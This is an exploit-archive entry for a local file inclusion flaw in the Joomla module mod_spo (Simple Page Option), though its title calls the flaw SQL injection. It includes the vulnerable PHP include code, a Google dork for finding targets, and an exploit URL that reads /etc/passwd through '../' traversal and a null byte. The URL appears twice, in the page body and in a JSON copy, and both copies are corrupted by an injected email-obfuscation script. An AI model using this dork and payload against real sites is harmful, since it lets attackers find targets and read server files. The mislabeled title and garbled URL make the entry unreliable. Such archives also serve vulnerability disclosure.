Search...

Joomla Component mod_spo SQL Injection Vulnerability

2011-07-21T00:00:00

ID 1337DAY-ID-16551
Type zdt
Reporter SeguridadBlanca
Modified 2011-07-21T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            # Exploit Title: Simple Page Option LFI
# Google Dork: inurl:mod_spo
# Date: 15/07/2011
# Author: SeguridadBlanca.Blogspot.com or SeguridadBlanca
# Software Link: http://joomlacode.org/gf/download/frsrelease/11841/47776/mod_spo_1.5.16.zip
# Version: 1.5.x
# Tested on: Backtrack and Windows 7
 
Simple Page Option â€“ LFI
Vulnerable-Code:
$s_lang
=& JRequest::getVar('spo_site_lang');
(file_exists(dirname(__FILE__).DS.'languages'.DS.$s_lang.'.php'))
? include(dirname(__FILE__).DS.'languages'.DS.$s_lang.'.php')
: include(dirname(__FILE__).DS.'languages'.DS.'english.php');
Vulnerable-Var:
spo_site_lang=
 
Expl0iting:
http://www.xxx.com/home/modules/mod_spo/[email protected]&lt;script type="text/javascript"&gt;
/* &lt;![CDATA[ */
(function(){try{var s,a,i,j,r,c,l=document.getElementById("__cf_email__");a=l.className;if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})();
/* ]]&gt; */
&lt;/script&gt;&spo_f_email[0][email protected]&lt;script type="text/javascript"&gt;
/* &lt;![CDATA[ */
(function(){try{var s,a,i,j,r,c,l=document.getElementById("__cf_email__");a=l.className;if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})();
/* ]]&gt; */
&lt;/script&gt;&spo_message=20&spo_msg_ftr=This%20contact%20message%20was%20generated%20using
%20Simple%20Page%20Options%20Module%20from%20SITEURL.&spo_send_type=&spo_site_lang=../../../../../../../../../../etc/passwd% 00&spo_site_name=Alfredo%20Arauz&spo_url_type=1&spo_url2se
 
Reparing?:
Just Filter with str_replace(); or htaccess protection to the vulnerable file.
 
gr33tz: Alfredo Arauz, SeguridadBlanca.Blogspot.com, Ecuador and PerÃº Security.



#  0day.today [2018-01-01]  #

JSON Vulners Source

Initial Source

{"id": "1337DAY-ID-16551", "lastseen": "2018-01-01T09:10:49", "viewCount": 27, "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": -0.0, "vector": "NONE", "modified": "2018-01-01T09:10:49", "rev": 2}, "dependencies": {"references": [], "modified": "2018-01-01T09:10:49", "rev": 2}, "vulnersScore": -0.0}, "type": "zdt", "sourceHref": "https://0day.today/exploit/16551", "description": "Exploit for php platform in category web applications", "title": "Joomla Component mod_spo SQL Injection Vulnerability", "cvelist": [], "sourceData": "# Exploit Title: Simple Page Option LFI\r\n# Google Dork: inurl:mod_spo\r\n# Date: 15/07/2011\r\n# Author: SeguridadBlanca.Blogspot.com or SeguridadBlanca\r\n# Software Link: http://joomlacode.org/gf/download/frsrelease/11841/47776/mod_spo_1.5.16.zip\r\n# Version: 1.5.x\r\n# Tested on: Backtrack and Windows 7\r\n \r\nSimple Page Option \u00e2\u20ac\u201c LFI\r\nVulnerable-Code:\r\n$s_lang\r\n=& JRequest::getVar('spo_site_lang');\r\n(file_exists(dirname(__FILE__).DS.'languages'.DS.$s_lang.'.php'))\r\n? include(dirname(__FILE__).DS.'languages'.DS.$s_lang.'.php')\r\n: include(dirname(__FILE__).DS.'languages'.DS.'english.php');\r\nVulnerable-Var:\r\nspo_site_lang=\r\n \r\nExpl0iting:\r\nhttp://www.xxx.com/home/modules/mod_spo/[email\u00a0protected]<script type=\"text/javascript\">\r\n/* <![CDATA[ */\r\n(function(){try{var s,a,i,j,r,c,l=document.getElementById(\"__cf_email__\");a=l.className;if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})();\r\n/* ]]> */\r\n</script>&spo_f_email[0][email\u00a0protected]<script type=\"text/javascript\">\r\n/* <![CDATA[ */\r\n(function(){try{var s,a,i,j,r,c,l=document.getElementById(\"__cf_email__\");a=l.className;if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})();\r\n/* ]]> */\r\n</script>&spo_message=20&spo_msg_ftr=This%20contact%20message%20was%20generated%20using\r\n%20Simple%20Page%20Options%20Module%20from%20SITEURL.&spo_send_type=&spo_site_lang=../../../../../../../../../../etc/passwd% 00&spo_site_name=Alfredo%20Arauz&spo_url_type=1&spo_url2se\r\n \r\nReparing?:\r\nJust Filter with str_replace(); or htaccess protection to the vulnerable file.\r\n \r\ngr33tz: Alfredo Arauz, SeguridadBlanca.Blogspot.com, Ecuador and Per\u00c3\u00ba Security.\r\n\r\n\n\n# 0day.today [2018-01-01] #", "published": "2011-07-21T00:00:00", "references": [], "reporter": "SeguridadBlanca", "modified": "2011-07-21T00:00:00", "href": "https://0day.today/exploit/description/16551"}